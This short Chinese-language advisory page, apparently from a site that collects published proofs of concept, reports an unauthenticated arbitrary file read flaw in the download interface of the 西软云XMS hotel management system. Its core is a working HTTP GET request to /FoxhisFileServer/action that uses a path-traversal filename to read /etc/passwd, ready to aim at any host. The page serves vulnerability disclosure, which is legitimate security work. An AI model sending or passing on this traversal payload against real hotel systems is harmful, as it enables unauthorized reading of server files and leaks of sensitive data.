西软云XMS download 存在任意文件读取漏洞

日期: 2025-11-11 | 影响软件: 西软云XMS | POC: 已公开

漏洞描述

西软云 XMS 是基于云平台数据中心开发的支持多酒店、多语言、多平台的酒店管理系统。西软云XMS download接口存在任意文件读取漏洞。未经授权的远程攻击者可以利用该漏洞,造成敏感信息泄露。

PoC代码

GET /FoxhisFileServer/action?method=download&filename=/..//..//..//..//..//..//..//..//..//..//..//../etc/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Safari/537.36

相关漏洞推荐